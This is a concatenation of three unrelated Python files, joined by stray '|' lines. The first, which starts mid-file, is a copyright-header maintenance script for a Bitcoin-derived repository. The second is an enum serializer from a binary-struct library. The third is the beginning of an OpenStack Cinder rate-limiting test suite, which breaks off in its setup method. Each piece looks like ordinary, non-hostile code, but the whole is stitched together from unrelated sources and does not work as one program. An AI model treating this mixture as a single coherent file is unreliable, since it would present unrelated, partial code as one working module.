ANY_COPYRIGHT_STYLE = '(%s|%s)' % (COPYRIGHT_WITH_C, COPYRIGHT_WITHOUT_C)

# Years appear as a single year, a range (e.g. 2009-2014), or a comma list.
YEAR = "20[0-9][0-9]"
YEAR_RANGE = '(%s)(-%s)?' % (YEAR, YEAR)
YEAR_LIST = '(%s)(, %s)+' % (YEAR, YEAR)
ANY_YEAR_STYLE = '(%s|%s)' % (YEAR_RANGE, YEAR_LIST)
ANY_COPYRIGHT_STYLE_OR_YEAR_STYLE = ("%s %s" % (ANY_COPYRIGHT_STYLE,
                                                ANY_YEAR_STYLE))

# Matches any copyright line regardless of holder.
ANY_COPYRIGHT_COMPILED = re.compile(ANY_COPYRIGHT_STYLE_OR_YEAR_STYLE)
def compile_copyright_regex(copyright_style, year_style, name):
    """Compile a regex matching '<copyright marker> <year(s)> <holder>'."""
    pattern = ' '.join((copyright_style, year_style, name))
    return re.compile(pattern)
# Copyright holders we expect to find, written as regex fragments (each ends
# with a literal newline so the match is anchored to the end of the line).
# Fixes: the original list repeated the "Pivx" and ION "Developers" groups
# verbatim; because gather_file_info() iterates this list and increments
# 'classified_copyrights' per entry, duplicates double-counted matches (and
# compiled redundant regexes).  Backslash escapes are now written explicitly
# ('\\.') to avoid invalid-escape-sequence warnings; values are unchanged.
EXPECTED_HOLDER_NAMES = [
    "Satoshi Nakamoto\n",
    "The Bitcoin Core developers\n",
    "The Bitcoin Core developers \n",
    "Bitcoin Core Developers\n",
    "the Bitcoin Core developers\n",
    "The Bitcoin developers\n",
    "The Pivx Core developers\n",
    "The Pivx Core developers \n",
    "Pivx Core Developers\n",
    "the Pivx Core developers\n",
    "The Pivx developers\n",
    "The PIVX Core developers\n",
    "The PIVX Core developers \n",
    "PIVX Core Developers\n",
    "the PIVX Core developers\n",
    "The PIVX developers\n",
    "cevap\n",
    "Ion Tor\n",
    "The ION Core Developers\n",
    "The ION Core Developers \n",
    "Ion Core Developers\n",
    "the ION Core Developers\n",
    "The Ion developers\n",
    "The ION Core developers\n",
    "The ION Core developers \n",
    "ION Core Developers\n",
    "the ION Core developers\n",
    "The ION developers\n",
    "The LevelDB Authors\\. All rights reserved\\.\n",
    "BitPay Inc\\.\n",
    "BitPay, Inc\\.\n",
    "University of Illinois at Urbana-Champaign\\.\n",
    "MarcoFalke\n",
    "Pieter Wuille\n",
    "Pieter Wuille +\\*\n",
    "Pieter Wuille, Gregory Maxwell +\\*\n",
    "Pieter Wuille, Andrew Poelstra +\\*\n",
    "Andrew Poelstra +\\*\n",
    "Wladimir J. van der Laan\n",
    "Jeff Garzik\n",
    "Diederik Huys, Pieter Wuille +\\*\n",
    "Thomas Daede, Cory Fields +\\*\n",
    "Jan-Klaas Kollhof\n",
    "Sam Rushing\n",
    "ArtForz -- public domain half-a-node\n",
]
# Pre-compile one regex per expected holder for each of the three
# recognized copyright styles (dominant "(c) YYYY[-YYYY]", year-list,
# and the bare "Copyright" form without "(c)").
DOMINANT_STYLE_COMPILED = {}
YEAR_LIST_STYLE_COMPILED = {}
WITHOUT_C_STYLE_COMPILED = {}
for holder_name in EXPECTED_HOLDER_NAMES:
    DOMINANT_STYLE_COMPILED[holder_name] = (
        compile_copyright_regex(COPYRIGHT_WITH_C, YEAR_RANGE, holder_name))
    YEAR_LIST_STYLE_COMPILED[holder_name] = (
        compile_copyright_regex(COPYRIGHT_WITH_C, YEAR_LIST, holder_name))
    WITHOUT_C_STYLE_COMPILED[holder_name] = (
        compile_copyright_regex(COPYRIGHT_WITHOUT_C, ANY_YEAR_STYLE,
                                holder_name))
################################################################################
# search file contents for copyright message of particular category
################################################################################

def get_count_of_copyrights_of_any_style_any_holder(contents):
    """Count every copyright-looking line in *contents*, any holder."""
    return len(ANY_COPYRIGHT_COMPILED.findall(contents))

def file_has_dominant_style_copyright_for_holder(contents, holder_name):
    """True if *contents* has a '(c) YYYY[-YYYY] <holder>' line."""
    match = DOMINANT_STYLE_COMPILED[holder_name].search(contents)
    return match is not None

def file_has_year_list_style_copyright_for_holder(contents, holder_name):
    """True if *contents* has a '(c) YYYY, YYYY[, ...] <holder>' line."""
    match = YEAR_LIST_STYLE_COMPILED[holder_name].search(contents)
    return match is not None

def file_has_without_c_style_copyright_for_holder(contents, holder_name):
    """True if *contents* has a 'Copyright <years> <holder>' line (no '(c)')."""
    match = WITHOUT_C_STYLE_COMPILED[holder_name].search(contents)
    return match is not None
################################################################################
# get file info
################################################################################
def read_file(filename):
    """Return the full text contents of *filename*.

    Uses a context manager so the file handle is closed promptly instead of
    leaking until garbage collection (the original never closed it).
    """
    with open(os.path.abspath(filename), 'r') as f:
        return f.read()
def gather_file_info(filename):
    """Collect copyright-classification info for a single file into a dict."""
    contents = read_file(filename)
    info = {
        'filename': filename,
        'contents': contents,
        'all_copyrights':
            get_count_of_copyrights_of_any_style_any_holder(contents),
        'classified_copyrights': 0,
        'dominant_style': {},
        'year_list_style': {},
        'without_c_style': {},
    }
    for holder_name in EXPECTED_HOLDER_NAMES:
        dominant = file_has_dominant_style_copyright_for_holder(
            contents, holder_name)
        year_list = file_has_year_list_style_copyright_for_holder(
            contents, holder_name)
        without_c = file_has_without_c_style_copyright_for_holder(
            contents, holder_name)
        info['dominant_style'][holder_name] = dominant
        info['year_list_style'][holder_name] = year_list
        info['without_c_style'][holder_name] = without_c
        # A file counts as classified once any style matches this holder.
        if dominant or year_list or without_c:
            info['classified_copyrights'] += 1
    return info
################################################################################
# report execution
################################################################################
SEPARATOR = '-'.join(['' for _ in range(80)])
def print_filenames(filenames, verbose):
    """Print each filename indented by one tab, but only in verbose mode."""
    if verbose:
        for name in filenames:
            print("\t%s" % name)
def print_report(file_infos, verbose):
    """Print the full copyright report to stdout.

    Sections: examined-file count, a histogram of copyright counts per file
    (0/1/2/3/4+), per-holder breakdowns for each of the three recognized
    styles, and finally files with unclassified copyright notices.
    """
    print(SEPARATOR)
    examined = [i['filename'] for i in file_infos]
    print("%d files examined according to INCLUDE and EXCLUDE fnmatch rules" %
          len(examined))
    print_filenames(examined, verbose)
    print(SEPARATOR)
    print('')
    # Histogram of total copyright notices per file.
    zero_copyrights = [i['filename'] for i in file_infos if
                       i['all_copyrights'] == 0]
    print("%4d with zero copyrights" % len(zero_copyrights))
    print_filenames(zero_copyrights, verbose)
    one_copyright = [i['filename'] for i in file_infos if
                     i['all_copyrights'] == 1]
    print("%4d with one copyright" % len(one_copyright))
    print_filenames(one_copyright, verbose)
    two_copyrights = [i['filename'] for i in file_infos if
                      i['all_copyrights'] == 2]
    print("%4d with two copyrights" % len(two_copyrights))
    print_filenames(two_copyrights, verbose)
    three_copyrights = [i['filename'] for i in file_infos if
                        i['all_copyrights'] == 3]
    print("%4d with three copyrights" % len(three_copyrights))
    print_filenames(three_copyrights, verbose)
    four_or_more_copyrights = [i['filename'] for i in file_infos if
                               i['all_copyrights'] >= 4]
    print("%4d with four or more copyrights" % len(four_or_more_copyrights))
    print_filenames(four_or_more_copyrights, verbose)
    print('')
    print(SEPARATOR)
    # Per-holder breakdown, one section per recognized style.
    print('Copyrights with dominant style:\ne.g. "Copyright (c)" and '
          '"<year>" or "<startYear>-<endYear>":\n')
    for holder_name in EXPECTED_HOLDER_NAMES:
        dominant_style = [i['filename'] for i in file_infos if
                          i['dominant_style'][holder_name]]
        if len(dominant_style) > 0:
            print("%4d with '%s'" % (len(dominant_style),
                                     holder_name.replace('\n', '\\n')))
            print_filenames(dominant_style, verbose)
    print('')
    print(SEPARATOR)
    print('Copyrights with year list style:\ne.g. "Copyright (c)" and '
          '"<year1>, <year2>, ...":\n')
    for holder_name in EXPECTED_HOLDER_NAMES:
        year_list_style = [i['filename'] for i in file_infos if
                           i['year_list_style'][holder_name]]
        if len(year_list_style) > 0:
            print("%4d with '%s'" % (len(year_list_style),
                                     holder_name.replace('\n', '\\n')))
            print_filenames(year_list_style, verbose)
    print('')
    print(SEPARATOR)
    print('Copyrights with no "(c)" style:\ne.g. "Copyright" and "<year>" or '
          '"<startYear>-<endYear>":\n')
    for holder_name in EXPECTED_HOLDER_NAMES:
        without_c_style = [i['filename'] for i in file_infos if
                           i['without_c_style'][holder_name]]
        if len(without_c_style) > 0:
            print("%4d with '%s'" % (len(without_c_style),
                                     holder_name.replace('\n', '\\n')))
            print_filenames(without_c_style, verbose)
    print('')
    print(SEPARATOR)
    # Files whose total notice count exceeds what was attributed to any
    # expected holder.
    unclassified_copyrights = [i['filename'] for i in file_infos if
                               i['classified_copyrights'] < i['all_copyrights']]
    print("%d with unexpected copyright holder names" %
          len(unclassified_copyrights))
    print_filenames(unclassified_copyrights, verbose)
    print(SEPARATOR)
def exec_report(base_directory, verbose):
    """Run the copyright report over base_directory.

    The working directory is restored in a finally block so an exception
    while scanning does not leave the process chdir'd into the repository
    (the original skipped the restore on error).
    """
    original_cwd = os.getcwd()
    os.chdir(base_directory)
    try:
        filenames = get_filenames_to_examine()
        file_infos = [gather_file_info(f) for f in filenames]
        print_report(file_infos, verbose)
    finally:
        os.chdir(original_cwd)
################################################################################
# report cmd
################################################################################
REPORT_USAGE = """
Produces a report of all copyright header notices found inside the source files
of a repository.
Usage:
    $ ./copyright_header.py report <base_directory> [verbose]
Arguments:
    <base_directory> - The base directory of a bitcoin source code repository.
    [verbose] - Includes a list of every file of each subcategory in the report.
"""
def report_cmd(argv):
    """Handle the 'report' subcommand.

    argv is the full sys.argv: argv[2] is the repository base directory and
    the optional argv[3] must be the literal string 'verbose'.
    """
    if len(argv) == 2:
        sys.exit(REPORT_USAGE)
    base_directory = argv[2]
    if not os.path.exists(base_directory):
        sys.exit("*** bad <base_directory>: %s" % base_directory)
    if len(argv) == 3:
        verbose = False
    elif argv[3] == 'verbose':
        verbose = True
    else:
        # Bug fix: the unrecognized token is argv[3]; the original printed
        # argv[2] (the base directory) in the error message.
        sys.exit("*** unknown argument: %s" % argv[3])
    exec_report(base_directory, verbose)
################################################################################
# query git for year of last change
################################################################################
# Kept for backward compatibility with any external user of this constant;
# call_git_log now builds an argument list instead of formatting this string.
GIT_LOG_CMD = "git log --pretty=format:%%ai %s"
def call_git_log(filename):
    """Return the author-date lines of `git log` for filename.

    Bug fix: the command is passed as an argument list rather than split on
    single spaces, so filenames containing whitespace reach git intact.
    """
    out = subprocess.check_output(
        ['git', 'log', '--pretty=format:%ai', filename])
    return out.decode("utf-8").split('\n')
def get_git_change_years(filename):
    """Return the years (as strings) in which git recorded changes to filename.

    Falls back to the current year when the file has no git history (e.g. a
    brand-new uncommitted file). Bug fix: the original `len(...) == 0` guard
    could never fire because str.split always yields at least one element;
    blank lines are now filtered first. The fallback also returns the year as
    a string so it is comparable with the normal return values.
    """
    git_log_lines = [l for l in call_git_log(filename) if l.strip() != '']
    if len(git_log_lines) == 0:
        return [str(datetime.date.today().year)]
    # timestamp is in ISO 8601 format. e.g. "2016-09-05 14:25:32 -0600"
    return [line.split(' ')[0].split('-')[0] for line in git_log_lines]
def get_most_recent_git_change_year(filename):
    """Return the latest year in which git saw a change to filename."""
    years = get_git_change_years(filename)
    return max(years)
################################################################################
# read and write to file
################################################################################
def read_file_lines(filename):
    """Return the file's lines (newline terminators preserved).

    Uses a context manager so the handle is closed even if readlines raises.
    """
    with open(os.path.abspath(filename), 'r') as f:
        return f.readlines()
def write_file_lines(filename, file_lines):
    """Concatenate file_lines and write them to filename.

    Uses a context manager so the handle is flushed and closed even if the
    write raises.
    """
    with open(os.path.abspath(filename), 'w') as f:
        f.write(''.join(file_lines))
################################################################################
# update header years execution
################################################################################
# Regex fragments for the updatable "The Bitcoin Core developers" line.
# Fix: use a raw string for the escaped parentheses — '\(' in a regular
# string literal is an invalid escape sequence (DeprecationWarning on
# modern Python).
COPYRIGHT = r'Copyright \(c\)'
YEAR = "20[0-9][0-9]"
YEAR_RANGE = '(%s)(-%s)?' % (YEAR, YEAR)
HOLDER = 'The Bitcoin Core developers'
UPDATEABLE_LINE_COMPILED = re.compile(' '.join([COPYRIGHT, YEAR_RANGE, HOLDER]))
def get_updatable_copyright_line(file_lines):
    """Return (index, line) of the first updatable copyright line.

    Returns (None, None) when no line matches.
    """
    for idx, candidate in enumerate(file_lines):
        if UPDATEABLE_LINE_COMPILED.search(candidate) is not None:
            return idx, candidate
    return None, None
def parse_year_range(year_range):
    """Split '<start>' or '<start>-<end>' into a (start, end) string pair."""
    parts = year_range.split('-')
    if len(parts) == 1:
        return parts[0], parts[0]
    return parts[0], parts[1]
def year_range_to_str(start_year, end_year):
    """Format a year range, collapsing identical start/end to a single year."""
    if start_year != end_year:
        return "%s-%s" % (start_year, end_year)
    return start_year
def create_updated_copyright_line(line, last_git_change_year):
    """Return `line` with its copyright end-year bumped to last_git_change_year.

    Returns the line unchanged when the end year is already current. Any text
    ahead of the 'Copyright (c) ' marker (the comment leader, which varies
    from file to file) is preserved verbatim.
    """
    marker = 'Copyright (c) '
    pieces = line.split(marker)
    leader = pieces[0]
    remainder = pieces[1]
    tokens = remainder.split(' ')
    start_year, end_year = parse_year_range(tokens[0])
    if end_year == last_git_change_year:
        return line
    updated_range = year_range_to_str(start_year, last_git_change_year)
    return leader + marker + updated_range + ' ' + ' '.join(tokens[1:])
def update_updatable_copyright(filename):
    """Bump the end-year of the file's Core copyright line, if stale.

    Reads the file, locates the first updatable copyright line, compares its
    end year against the most recent git change year, and rewrites the file
    only when the line actually changed. Prints one status line per file.
    """
    file_lines = read_file_lines(filename)
    index, line = get_updatable_copyright_line(file_lines)
    if not line:
        print_file_action_message(filename, "No updatable copyright.")
        return
    last_git_change_year = get_most_recent_git_change_year(filename)
    new_line = create_updated_copyright_line(line, last_git_change_year)
    if line == new_line:
        print_file_action_message(filename, "Copyright up-to-date.")
        return
    # Replace the stale line in place and write the whole file back.
    file_lines[index] = new_line
    write_file_lines(filename, file_lines)
    print_file_action_message(filename,
                              "Copyright updated! -> %s" % last_git_change_year)
def exec_update_header_year(base_directory):
    """Update copyright years across base_directory.

    The working directory is restored in a finally block so a failure while
    updating a file does not leave the process chdir'd into the repository
    (the original skipped the restore on error).
    """
    original_cwd = os.getcwd()
    os.chdir(base_directory)
    try:
        for filename in get_filenames_to_examine():
            update_updatable_copyright(filename)
    finally:
        os.chdir(original_cwd)
################################################################################
# update cmd
################################################################################
UPDATE_USAGE = """
Updates all the copyright headers of "The Bitcoin Core developers" which were
changed in a year more recent than is listed. For example:
// Copyright (c) <firstYear>-<lastYear> The Bitcoin Core developers
will be updated to:
// Copyright (c) <firstYear>-<lastModifiedYear> The Bitcoin Core developers
where <lastModifiedYear> is obtained from the 'git log' history.
This subcommand also handles copyright headers that have only a single year. In those cases:
// Copyright (c) <year> The Bitcoin Core developers
will be updated to:
// Copyright (c) <year>-<lastModifiedYear> The Bitcoin Core developers
where the update is appropriate.
Usage:
$ ./copyright_header.py update <base_directory>
Arguments:
<base_directory> - The base directory of a bitcoin source code repository.
"""
def print_file_action_message(filename, action):
    """Print filename left-justified to 52 columns, then the action taken."""
    print(filename.ljust(52) + " " + action)
def update_cmd(argv):
    """Handle the 'update' subcommand: argv[2] must be the repo base dir."""
    if len(argv) != 3:
        sys.exit(UPDATE_USAGE)
    base_directory = argv[2]
    if os.path.exists(base_directory):
        exec_update_header_year(base_directory)
    else:
        sys.exit("*** bad base_directory: %s" % base_directory)
################################################################################
# inserted copyright header format
################################################################################
def get_header_lines(header, start_year, end_year):
    """Instantiate a header template with the year range.

    Drops the template's leading/trailing blank lines and returns a list of
    newline-terminated lines.
    """
    lines = header.split('\n')[1:-1]
    first = lines[0] % year_range_to_str(start_year, end_year)
    return ['%s\n' % text for text in [first] + lines[1:]]
CPP_HEADER = '''
// Copyright (c) %s The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
def get_cpp_header_lines_to_insert(start_year, end_year):
    """Return the C++ header lines reversed (callers insert at a fixed index)."""
    lines = get_header_lines(CPP_HEADER, start_year, end_year)
    return reversed(lines)
PYTHON_HEADER = '''
# Copyright (c) %s The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
def get_python_header_lines_to_insert(start_year, end_year):
    """Return the Python header lines reversed (callers insert at a fixed index)."""
    lines = get_header_lines(PYTHON_HEADER, start_year, end_year)
    return reversed(lines)
################################################################################
# query git for year of last change
################################################################################
def get_git_change_year_range(filename):
    """Return (earliest, latest) git change years for filename."""
    years = sorted(get_git_change_years(filename))
    return years[0], years[-1]
################################################################################
# check for existing core copyright
################################################################################
def file_already_has_core_copyright(file_lines):
    """True if the file already contains an updatable Core copyright line."""
    index, _ = get_updatable_copyright_line(file_lines)
    # Idiom fix: identity comparison with None ('is not'), not '!='.
    return index is not None
################################################################################
# insert header execution
################################################################################
def file_has_hashbang(file_lines):
    """True if the first line starts with '#!' and is longer than two chars.

    NOTE: a bare two-character '#!' line is deliberately not counted,
    matching the original length check.
    """
    if not file_lines:
        return False
    first = file_lines[0]
    return len(first) > 2 and first.startswith('#!')
def insert_python_header(filename, file_lines, start_year, end_year):
    """Insert the Python copyright header, below a '#!' line when present."""
    insert_idx = 1 if file_has_hashbang(file_lines) else 0
    # The header lines come pre-reversed, so repeated inserts at a fixed
    # index restore their natural order.
    for header_line in get_python_header_lines_to_insert(start_year, end_year):
        file_lines.insert(insert_idx, header_line)
    write_file_lines(filename, file_lines)
def insert_cpp_header(filename, file_lines, start_year, end_year):
    """Insert the C++ copyright header at the very top of the file."""
    # The header lines come pre-reversed, so repeated inserts at index 0
    # restore their natural order.
    for header_line in get_cpp_header_lines_to_insert(start_year, end_year):
        file_lines.insert(0, header_line)
    write_file_lines(filename, file_lines)
def exec_insert_header(filename, style):
    """Insert a Core copyright header into filename using the given style.

    Exits with an error when the file already carries a Core copyright.
    """
    file_lines = read_file_lines(filename)
    if file_already_has_core_copyright(file_lines):
        sys.exit('*** %s already has a copyright by The Bitcoin Core developers'
                 % (filename))
    start_year, end_year = get_git_change_year_range(filename)
    inserter = insert_python_header if style == 'python' else insert_cpp_header
    inserter(filename, file_lines, start_year, end_year)
################################################################################
# insert cmd
################################################################################
INSERT_USAGE = """
Inserts a copyright header for "The Bitcoin Core developers" at the top of the
file in either Python or C++ style as determined by the file extension. If the
file is a Python file and it has a '#!' starting the first line, the header is
inserted in the line below it.
The copyright dates will be set to be:
"<year_introduced>-<current_year>"
where <year_introduced> is according to the 'git log' history. If
<year_introduced> is equal to <current_year>, the date will be set to be:
"<current_year>"
If the file already has a copyright for "The Bitcoin Core developers", the
script will exit.
Usage:
    $ ./copyright_header.py insert <file>
Arguments:
    <file> - A source file in the bitcoin repository.
"""
def insert_cmd(argv):
    """Handle the 'insert' subcommand: argv[2] is the target source file."""
    if len(argv) != 3:
        sys.exit(INSERT_USAGE)
    filename = argv[2]
    if not os.path.isfile(filename):
        sys.exit("*** bad filename: %s" % filename)
    _, extension = os.path.splitext(filename)
    if extension not in ('.h', '.cpp', '.cc', '.c', '.py'):
        sys.exit("*** cannot insert for file extension %s" % extension)
    style = 'python' if extension == '.py' else 'cpp'
    exec_insert_header(filename, style)
################################################################################
# UI
################################################################################
USAGE = """
copyright_header.py - utilities for managing copyright headers of 'The Bitcoin
Core developers' in repository source files.
Usage:
    $ ./copyright_header <subcommand>
Subcommands:
    report
    update
    insert
To see subcommand usage, run them without arguments.
"""
SUBCOMMANDS = ['report', 'update', 'insert']
if __name__ == "__main__":
    # Dispatch to the subcommand handler; unknown or missing subcommands
    # print the top-level usage text.
    if len(sys.argv) == 1:
        sys.exit(USAGE)
    subcommand = sys.argv[1]
    if subcommand not in SUBCOMMANDS:
        sys.exit(USAGE)
    dispatch = {'report': report_cmd,
                'update': update_cmd,
                'insert': insert_cmd}
    dispatch[subcommand](sys.argv)
|
|
"""
:file: enum.py
Contains a more natural enum implementation.
:date: 10/06/2016
:authors:
- Gilad Naaman <gilad@naaman.io>
"""
from .base import *
from .scalars import *
import collections
__all__ = ('Enum', 'auto')
class auto:
    """Placeholder for auto-assigned enum literal values.

    Exists solely to satisfy static type-checkers; the enum metaclass
    replaces every `auto` instance with a concrete int during class
    creation, so `__int__` should never actually run.
    """

    def __int__(self):
        raise RuntimeError('This is not supposed to happen')
class Literal:
    """A single named value belonging to an Enum type.

    Converts to int, compares numerically, and hashes on the
    (enum, name, value) triple. NOTE(review): two literals with equal values
    but different names compare equal yet hash differently — preexisting
    behavior, confirm it is intended before relying on Literal in sets.
    """

    def __init__(self, enum_type, literal_name, value):
        self.enum = enum_type
        self.literal_name = literal_name
        self.value = value

    def __int__(self):
        return self.value

    def __repr__(self):
        return f'{get_type_name(self.enum)}.{self.literal_name}'

    def __eq__(self, other):
        # Robustness fix: comparing against a non-numeric object used to
        # raise TypeError from int(other); returning NotImplemented lets
        # Python fall back to the default (unequal) semantics instead.
        try:
            return int(self) == int(other)
        except (TypeError, ValueError):
            return NotImplemented

    def __hash__(self):
        return hash((self.enum, self.literal_name, self.value))
class EnumMetadata(SerializerMetadata):
    """Metadata attached to each Enum type.

    Holds the ordered literal table, its value->Literal reverse map, the
    underlying scalar serializer and the flags marker.
    """
    __slots__ = ('flags', 'serializer', 'literals', 'reverse_map')

    _VALID_UNDERLYING_TYPES = (
        u8, u16, u32, u64, i8, i16, i32, i64,
        u8_le, u16_le, u32_le, u64_le, i8_le, i16_le, i32_le, i64_le,
        u8_be, u16_be, u32_be, u64_be, i8_be, i16_be, i32_be, i64_be)

    def __init__(self, *,
                 literals: collections.OrderedDict,
                 reverse_map: Dict,
                 underlying: Type['Scalar'],
                 flags: bool = False):
        # Validate the underlying type *before* touching its byte_size so an
        # invalid type raises the intended TypeError instead of a confusing
        # AttributeError (the original called super().__init__ first).
        if underlying not in self._VALID_UNDERLYING_TYPES:
            raise TypeError(f'Invalid underlying type for Enum: {get_type_name(underlying)}')
        super().__init__(underlying.byte_size)
        serializer = get_as_value(underlying)
        try:
            # Every declared literal must be representable by the scalar.
            for k, v in literals.items():
                serializer.validate(v)
        except ValueError as e:
            # Chain the original error so the root cause is preserved.
            raise ValueError(f'Invalid value for literal {v}: {e}') from e
        self.flags = flags
        self.serializer = serializer
        self.literals = literals
        self.reverse_map = reverse_map
class EnumMeta(SerializerMeta):
    # Metaclass for Enum: collects int/`auto` class attributes into an
    # ordered literal table and attaches an EnumMetadata to the new class.
    _hydras_metadata: EnumMetadata
    def __new__(mcs, name, bases, classdict: collections.OrderedDict, underlying_type=i32):
        # NOTE(review): this gate checks `mcs` (the metaclass) for the meta
        # attribute — presumably to skip literal processing while the base
        # machinery is bootstrapping; confirm against SerializerMeta.
        if not hasattr(mcs, SerializerMeta.METAATTR):
            # Every non-underscore int/auto class attribute is a literal.
            literals = (
                (k, v) for k, v in classdict.items()
                if isinstance(v, (int, auto)) and not k.startswith('_')
            )
            literals_dict = collections.OrderedDict()
            next_expected_value = 0
            for lit_name, literal in literals:
                # Replace `auto` instances with the correct values.
                if isinstance(literal, auto):
                    # Update the literal object before taking its value
                    literal = next_expected_value
                    classdict[lit_name] = literal
                # Auto-numbering continues from the last explicit value.
                next_expected_value = literal + 1
                literals_dict[lit_name] = literal
            # Remove raw ints from the class body; access goes through
            # __getattr__ below, which wraps values in Literal objects.
            for lit_name in literals_dict:
                del classdict[lit_name]
            # NOTE(review): the comprehension variable `name` shadows the
            # class-name argument, and literals sharing a value collapse to a
            # single reverse_map entry (last one wins) — confirm intended.
            reverse_map = {
                value: Literal(mcs, name, value)
                for name, value in literals_dict.items()
            }
            metadata = EnumMetadata(literals=literals_dict, reverse_map=reverse_map, underlying=underlying_type)
            classdict.update({SerializerMeta.METAATTR: metadata})
            # Patch the actual enum type once we get it from super.
            gen_mcs = super(EnumMeta, mcs).__new__(mcs, name, bases, classdict)
            for lit in reverse_map.values():
                lit.enum = gen_mcs
            return gen_mcs
        return super(EnumMeta, mcs).__new__(mcs, name, bases, classdict)
    def __prepare__(cls, bases, **kwargs):
        # An OrderedDict class body preserves literal declaration order.
        return collections.OrderedDict()
    def __contains__(cls, item):
        # Membership: a Literal of this enum, or a raw int literal value.
        if isinstance(item, Literal):
            return item.enum == cls and cls.literals.get(item.literal_name) == item.value
        elif isinstance(item, int):
            return item in cls.literals.values()
        return False
    @property
    def literals(cls) -> collections.OrderedDict:
        # name -> value table, in declaration order.
        return cls._hydras_metadata.literals
    def __getattr__(cls, name):
        # Wrap literals in a `Literal` object
        if name in cls._hydras_metadata.literals:
            return Literal(cls, name, cls._hydras_metadata.literals[name])
        # NOTE(review): `type` has no __getattr__; this super() call is
        # expected to raise AttributeError for unknown names — confirm.
        return super().__getattr__(name)
    def __repr__(cls):
        return get_type_name(cls)
class Enum(Serializer, metaclass=EnumMeta):
    """An enum formatter that can be shared between structs."""
    __slots__ = ()
    _hydras_metadata: EnumMetadata

    def __init__(self, default_value=None, *args, **kwargs):
        """Initialize with a default literal.

        default_value may be None (first declared literal is used), an int
        that is a member of the enum, or a Literal of this exact enum type.
        """
        if type(self) is Enum:
            raise RuntimeError('Cannot instantiate `Enum` directly. Must subclass it.')
        elif len(self._hydras_metadata.literals) == 0:
            raise RuntimeError('Cannot instantiate an empty Enum')
        assert default_value is None or isinstance(default_value, (int, Literal))
        # Validate the default_value
        if default_value is None:
            default_value = self.get_literal_by_name(next(iter(self._hydras_metadata.literals)))
        elif isinstance(default_value, int):
            if not self.is_constant_valid(default_value):
                raise ValueError('Literal constant is not included in the enum: %d' % default_value)
            default_value = self.get_literal_by_value(default_value)
        elif isinstance(default_value, Literal):
            if default_value.enum is not type(self) or \
                    not self.is_constant_valid(default_value.value) or \
                    default_value.literal_name not in self._hydras_metadata.literals:
                raise ValueError('Invalid or corrupted literal')
        super(Enum, self).__init__(default_value, *args, **kwargs)

    def serialize_into(self, storage: memoryview, offset: int, value: Literal, settings: HydraSettings = None) -> int:
        """Serialize `value` (a Literal of this enum, or a valid int)."""
        assert (isinstance(value, Literal) and value.enum == type(self)) or \
               (isinstance(value, int) and self.is_constant_valid(value))
        return self._hydras_metadata.serializer.serialize_into(storage, offset, int(value), settings)

    def deserialize(self, raw_data, settings: HydraSettings = None):
        """Deserialize raw_data into a Literal; raise ValueError when unknown."""
        value = self._hydras_metadata.serializer.deserialize(raw_data, settings)
        # Bug fix: direct indexing raised KeyError for unknown values, making
        # the intended ValueError below unreachable. Use .get() instead.
        lit = self._hydras_metadata.reverse_map.get(value)
        if lit is None:
            raise ValueError('Parsed enum value is unknown: %d' % value)
        return lit

    def validate(self, value):
        """Validate the given enum value."""
        if not self.is_constant_valid(int(value)):
            # Bug fix: the original *returned* the ValueError instead of
            # raising it, so invalid values silently passed validation.
            raise ValueError('Enum literal value is not part of the enum')
        super(Enum, self).validate(int(value))

    def is_constant_valid(self, num):
        """Determine if the given number is a valid enum literal."""
        return num in self._hydras_metadata.reverse_map

    @classmethod
    def get_literal_name(cls, num):
        """Get the name of the constant from a number or a Literal object."""
        lit = cls._hydras_metadata.reverse_map.get(num)
        if lit is not None:
            return lit.literal_name
        return None

    @classmethod
    def get_literal_by_name(cls, name):
        """Construct a Literal for a declared literal name."""
        return Literal(cls, name, cls._hydras_metadata.literals[name])

    @classmethod
    def get_literal_by_value(cls, value):
        """Return the Literal for `value`, or None when unknown."""
        return cls._hydras_metadata.reverse_map.get(value)

    def values_equal(self, a, b):
        """Compare two enum values numerically."""
        return int(a) == int(b)

    def __repr__(self):
        value = self.get_initial_value()
        # The default (first-declared) literal renders as an empty arg list.
        if value.literal_name == next(iter(self._hydras_metadata.literals.keys())):
            value = ''
        return f'{get_type_name(self)}({value})'
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
import httplib
from xml.dom import minidom
from lxml import etree
import six
import webob
from cinder.api.v2 import limits
from cinder.api import views
from cinder.api import xmlutil
import cinder.context
from cinder.openstack.common import jsonutils
from cinder import test
# Rate-limit fixtures shared across these suites:
# (verb, display URI, matching regex, requests-per-unit, unit).
# NOTE(review): the generic PUT rule uses an empty regex '' where the other
# wildcard rules use '.*' — confirm that is intentional.
TEST_LIMITS = [
    limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
    limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
    limits.Limit("POST", "/volumes", "^/volumes", 3, limits.PER_MINUTE),
    limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
    limits.Limit("PUT", "/volumes", "^/volumes", 5, limits.PER_MINUTE),
]
# XML namespaces used when validating serialized limit documents.
NS = {
    'atom': 'http://www.w3.org/2005/Atom',
    'ns': 'http://docs.openstack.org/common/api/v1.0',
}
class BaseLimitTestSuite(test.TestCase):
    """Base test suite which provides relevant stubs and time abstraction."""
    def setUp(self):
        super(BaseLimitTestSuite, self).setUp()
        # Virtual clock: limits.Limit reads time through the stubbed
        # _get_time, so tests advance time deterministically via self.time.
        self.time = 0.0
        self.stubs.Set(limits.Limit, "_get_time", self._get_time)
        # Per-test absolute quota values served by the stub below.
        self.absolute_limits = {}
        def stub_get_project_quotas(context, project_id, usages=True):
            return dict((k, dict(limit=v))
                        for k, v in self.absolute_limits.items())
        # NOTE(review): relies on `cinder.quota` being reachable as an
        # attribute of the imported `cinder` package — confirm.
        self.stubs.Set(cinder.quota.QUOTAS, "get_project_quotas",
                       stub_get_project_quotas)
